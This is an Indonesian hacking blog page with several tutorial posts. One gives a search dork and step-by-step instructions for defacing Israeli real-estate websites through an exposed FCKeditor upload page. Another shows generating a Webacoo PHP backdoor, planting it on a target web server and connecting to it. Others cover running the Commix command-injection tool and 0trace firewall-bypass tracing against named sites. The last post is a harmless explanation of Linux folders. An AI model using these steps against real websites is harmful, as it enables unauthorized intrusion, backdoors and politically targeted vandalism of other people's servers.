13/09/16

Deface Situs ISRAEL Dengan File Upload

Exhacking.net - Pada kesempatan kali ini saya akan berbagi tutorial tentang deface lagi seperti post sebelumnya, tapi tutor kali ini hanya khusus untuk situs israel, baiklah silahkan di simak.

Dork:
intext:"Powered by Real Estate in Israel"
kalian hanya dapat mengupload file dengan format : pdf, ppt, txt, doc, rtf, xml, xsl, dtd, zip, rar, jpg, png.
karena tujuan kita disini hanya untuk mendeface web tersebut maka file yang harus kita siapkan adalah file dengan format TXT, setelah itu masukan exploit ini di belakang URL target :
FCKeditor/editor/filemanager/connectors/uploadtest.html
Contoh SS :
Stelah itu kalian akan di bawa ke halaman seperti gambar di bawah ini :
Nah setelah berada disana kalian tinggal upload file deface kalian yang sudah di persiapkan tadi dengan format TXT, tapi sebelum mengupload file tersebut kalian harus mengatur settingannya seperti gambar di atas, kalo belum jelas saya jelasin :
Bagian "Select the File Uploader to use" ganti ke PHP
Bagian "Resource Type" ganti ke File.

Setelah itu klik "Send it to the Server", jika berhasil akan tampil di bagian "Uploaded File URL" nama file yang barusan kalian upload, selanjutnya tinggal kalian Copy tulisan tersebut lalu paste di belakang URL target dan akhirnya kalian berhasil :)
Selamat mencoba, sekian dan terimakasih :)

Exhacking.net - Pada kesempatan kali ini saya akan berbagi tutorial tentang deface lagi seperti post sebelumnya, tapi tutor kali ini hany...

11/09/16

Backdooring Dengan Webacoo di Kali-Linux

Exhacking.net - Webacoo adalah web backdoor Script-Kit , yang menyediakan keperluan pentest dengan remote terminal pada web server dan berkomunikasi melalui HTTP.
Webacoo menggunakan cookies HTTP sebagai saluran komunikasi rahasia, perintah yang akan dieksekusi pada server korban dan respon yang dikirim menggunakan dienkripsi cookie dalam permintaan HTTP dan header respon HTTP.

Step by step untuk menjalankan Webacoo di Kali-Linux adalah sebagai berikut,, buka terminal dan masukan perintah :
# webacoo -g -o backdoor.php
Maka akan terbuat sebuah file dengan nama backdoor.php, untuk memanipulasi korban kalian dapat mengganti nama backdoor.php dengan nama yang kalian inginkan.
Langkah selanjutnya adalah mengirim atau mengupload file backdoor.php ke Web server target, setelah berhasil mengirimkan file tersebut, sekarang waktunya untuk Connect ke target dengan perintah :
# webacoo -t -u http://meru.mycompany.com/backdoor.php
Jika berhasil akan seperti ini
Selanjutnya kita akan menangkap semua komunikasi  web server  target dengan Wireshark. Silahkan buka Wiresharknya lalu atur konfigurasi Wireshark seperti ini, pilih Network Interface, dan mulai capture, serta mengatur filter untuk HTTP.

Screenshot di bawah ini menunjukkan permintaan HTTP untuk  web server target. Kita bisa melihat bahwa perintah yang akan dieksekusi pada target terkirim menggunakan cookie yang dienkripsi.
Setelah itu terserah kalian mau di apakan web tersebut, Sekian dan terimakasih :)

Exhacking.net - Webacoo adalah web backdoor Script-Kit , yang menyediakan keperluan pentest dengan remote terminal pada web server dan be...

10/09/16

Cara Menggunakan Commix (Command Injection Exploiter)

Exhacking.net - Commix (command injection exploiter) adalah sebuah tools otomatis yang ditulis oleh Anastasios Stasinopoulos ( @ancst ) yang dapat digunakan untuk pengujian penetrasi dan peneliti keamanan sebuah web aplikasi.
Dengan menggunakan tools ini kita dapat menemukan sebuah bug dan mengeksploitasi kerentanan dengan perintah injection dalam parameter  HTTP Header tertentu.

Cara Penggunaan
Install Python terlebih dahulu, lalu intall commix dengan perintah :
# git clone https://github.com/stasinopoulos/commix.git commix
Jika kalian pengguna Kali-Linux, tools ini tidak perlu kalian install tapi jika kalian pengguna Distro Linux lain silahkan di install dengan perintah seperti di atas.
Tools ini juga dapat di install atau di jalankan di OS Windows dan MacOS, nah untuk pengguna Windows dan MacOS silahkan download Toolsnya di sini https://github.com/stasinopoulos/commix dan pastikan kalian sudah menginstall Python dan untuk cara penggunaannya hampir sama seperti di Linux.

Setelah semua persiapan selesai, sekarang waktunya kita menjalankan Tools tersebut dengan perintah :
# commix --url http://target.com
Perintah di atas hanya untuk pengguna Kali-Linux, sedangkan perintah untuk pengguna Distro Linux Lain dan juga OS Windows serta MacOS seperti berikut ini :
# python commix.py --url http://target.com
Nah seperti itulah cara penggunaan Commix, silahkan di sesauikan target dengan target masing-masing.
Sekian dan terimakasih :)

Exhacking.net - Commix ( command injection exploiter ) adalah sebuah tools otomatis yang ditulis oleh Anastasios Stasinopoulos ( @ancst )...

09/09/16

Cara Menggunakan 0trace di Kali-Linux

Exhacking.net - 0trace adalah script shell yang ditulis oleh Michal Zalewski. 0trace ini adalah sebuah tools yang di buat khusus untuk melakukan serangan bypassing pengintai / firewall yang memungkinkan hop enumeration ("traceroute") dalam sebuah koneksi TCP, seperti sesi HTTP atau SMTP. 0trace sendiri menyediakan server tambahan yang berguna untuk tester penetrasi.

Nah pada kesempatan ini saya akan mencoba berbagi cara penggunaan 0trace, baiklah seperti biasa buka terminal dan mencari Target, sebagai contoh target saya di sini adalah web cnn.com.
Lalu kita lakukan scan terhadap web tersebut dengan perintah
# ping cnn.com
Tujuan dari scan ini adalah untuk menemukan atau mencari IP dari target, ini adalah contoh hasil scan dari web target
  1. root@Haris32:~/# ping cnn.com
  2. PING cnn.com (157.166.255.19) 56(84) bytes of data.
  3. --- cnn.com ping statistics ---
  4. 2 packets transmitted, 0 received, 100% packet loss, time 1008ms
  5. root@Haris32:~/#
Lihat angka yang saya tandai dengan warna merah, itu adalah contoh IP dari target, sekarang ke langkah selanjutnya yaitu melakukan Traceroute dengan perintah
# traceroute 157.166.255.19
Sesuaikan IP target dengan IP target kalian sendiri, setelah memasukan perintah di atas, maka hasilnya akan seperti ini :
  1. root@Haris32:~/posts/2016-Sept# traceroute 157.166.255.19
  2. traceroute to 157.166.255.19 (157.166.255.19), 30 hops max, 40 byte packets
  3. 1  router (192.168.1.1)  2.154 ms  2.587 ms  3.111 ms
  4. 2  74-133-211-1.dhcp.insight.com (74.133.211.1)  24.118 ms  25.002 ms  25.155 ms
  5. 3  74-133-33-29.dhcp.insight.com (74.133.33.29)  25.571 ms  25.920 ms  26.459 ms
  6. 4  74.133.9.229 (74.133.9.229)  34.265 ms  34.599 ms  40.150 ms
  7. 5  xe-8-1-0.edge4.Atlanta2.Level3.net (4.59.12.49)  65.191 ms  66.506 ms  66.840 ms
  8. 6  ae-21-52.car1.Atlanta1.Level3.net (4.68.103.34)  67.296 ms ae-11-51.car1.Atlanta1.Level3.net (4.68.103.2)  20.669 ms  19.962 ms
  9. 7  * * *
  10. 8  * * *
  11. ....
  12. 29  * * *
  13. 30  * * *
Sekarang saatnya mengkonfigurasi Listener pada PC client menggunakan 0trace dengan perintah
# 0trace.sh wlan0 157.166.255.19
Warna merah sesuaikan dengan network interface kalian dan warna biru sesuaikan dengan IP target kalian tadi.
Setelah itu kita akan memulai membuat Established TCP Connection ke Target dengan perintah
# telnet 157.166.255.19 80
Dan hasilnya akan seperti ini :
  1. root@Haris32:~/# telnet 157.166.255.19 80
  2. Trying 157.166.255.19...
  3. Connected to 157.166.255.19.
  4. Escape character is '^]'.
  5. GET / HTTP / 1.0
  6. telnet> quit
  7. Connection closed.
  8. root@Haris32:~/#
Sekarang lihat 0trace akan menampilkan seluruh Route Info dari Client, seperti berikut ini.
  1. root@Haris32:~# /usr/local/sbin/0trace.sh wlan0 157.166.255.19
  2. 0trace v0.01 PoC by <lcamtuf@coredump.cx>
  3. [+] Waiting for traffic from target on wlan0...
  4. [+] Traffic acquired, waiting for a gap...
  5. [+] Target acquired: 192.168.1.99:39544 -> 157.166.255.19:80 (2048829642/3092775968).
  6. [+] Setting up a sniffer...
  7. [+] Sending probes...
  8. TRACE RESULTS
  9. -------------
  10. 1 192.168.1.1
  11. 2 74.133.211.1
  12. 3 74.133.33.29
  13. 4 74.133.9.229
  14. 5 4.59.12.49
  15. 6 4.68.103.2
  16. 7 4.71.20.14
  17. Target reached.
  18. root@Haris32:~#
Nah seperti itulah Cara Menggunakan 0trace di Kali-Linux , Sekian postingan saya kali ini semuga dapat membantu :)

Exhacking.net - 0trace adalah script shell yang ditulis oleh Michal Zalewski . 0trace ini adalah sebuah tools yang di buat khusus untuk m...

08/09/16

Penjelasan Folder-Folder Penting yang Ada di Linux

Exhacking.net - Linux merupakan sistem operasi yang open source atau berarti bebas dipergunakan, diutak-atik dan ya dimacem-macemin lah pokonya. Tapi sebagai pengguna Linux baru banyak user yang belum mengetahui folder-folder yang ada di Linux karena telah terbiasa menggunakan windows.
Nah, pada artikel saya kali ini saya akan menjelaskan tentang beberapa folder yang ada di linux.

Penjelasan Folder Linux
1. folder /bin, ini adalah tempat dimana program untuk perintah linux paling umum seperti ls, rm, mkdir, cp dsb. Yup, semua perintah Linux/Unix ada disini.

2. folder /boot, di folder ini isinya Kernel Linux/Unix, Grub, Image RAM, pokoknya segala hal yang diperlukan sebuah OS Linux/Unix untuk Booting up.

3. folder /dev berisi semua drive harddisk atau hardware seperti modem, CD/DVD/Blu-ray dsb. Hanya saja disini hanya merupakan link dan bukan isi, contohnya hdd partisi 1 ada di /dev/sda1 dan DVD-rom ada di /dev/sr0. untuk melihat isinya, harus dilakukan mounting (mount) terlebih dahulu.

4. folder /etc berisi files konfigurasi dari program/aplikasi yang terinstall di dalam OS, misal konfigurasi Apache ada di /etc/apache2 dan SSH di /etc/ssh.

5. folder /home, nah disini semua files dan folder milik seorang user disimpan, misalnya /home/ikons adalah folder milik user ikons, hal ini juga merupakan folder awal ketika kita melakukan remote ke ssh server dengan sebuah username. kalau di OS Windows folder ini mirip folder C:\Users\.

6. folder /lib, berisi files atau folder penting seperti library program-program atau modul kernel. biasanya file dependency sebuah program harus ditaruh disini.

7. folder /media merupakan folder mount dari external device seperti HDD external, flashdisk, CD/DVD. biasanya ketika memasukkan flashdisk ke USB, otomatis isinya akan muncul di file manager, sebenarnya itu lokasinya adalah di folder /media. beda dengan di OS Windows yang hanya langsung ditampilkan di file explorer.

8. folder /mnt juga merupakan folder mount, hanya saja sifatnya sementara dan dilakukan manual, contohnya mount /dev/sdc2 /mnt, maka file di HDD/flashdisk di /dev/sdc2 akan muncul di folder /mnt.

9. folder /opt biasanya di isi dengan program yang diinstall tidak melalui paket manager (apt-get atau yum), alias kompile dan install langsung dari kode sumber (source code).

10. folder /proc merupakan folder yang isinya files dimana kernel menerima informasi, contohnya processor ada di /proc/cpuinfo dan ram di /proc/meminfo.

11. folder /root, namanya saja root, ini adalah folder super user dimana ketika remote ke ssh server menggunakan root akan diarahkan kesini, bukan di folder home.

12. folder /sbin berisi semua program yang hanya dapat dijalankan oleh super user, alias harus di sudo/su terlebih dahulu.

13. folder /srv, folder ini bisa juga diisi oleh web server atau ftp server.

14. folder /sys adalah folder dimana informasi mengenai sistem yang bisa dibaca oleh kernel.

15. folder /tmp, tempat dimana file sementara disimpan, biasanya ketika install sebuah program.

16. folder /usr berisi program-program yang merupakan tools seperti gcc, git, vim, mysql dsb. pokoknya selain program dasar/sederhana seperti di folder /bin. kalau di OS Windows ini seperti folder Program Files.

17. folder /var yang merupakan folder yang isinya berubah (bertambah/berkurang) dengan cepat, seperti file log ada di folder /var/log, file email (sendmail/postfix) di /var/mail atau web server di folder /var/www (Fedora/CentOS ada di folder /home/user/public_html).

Yup, diatas merupakan beberapa penjelasan tentang folder-folder yang ada di linux. Cukup mudah dimengerti kan? memang penting untuk mengetahui fungsi dari tiap-tiap folder agar memudahkan kita untuk mengorganisir file-file kita supaya tidak berantakkan.
Meskipun terlihat sedikit rumit, tetapi menggunakan linux itu menyenangkan loh. Selain itu open source, kita juga dapat meningkatkan skill koding kita.
Sekian penjelasannya dari saya, semoga dapat bermanfaat bagi yang membutuhkan.

Exhacking.net - Linux merupakan sistem operasi yang open source atau berarti bebas dipergunakan, diutak-atik dan ya dimacem-macemin lah p...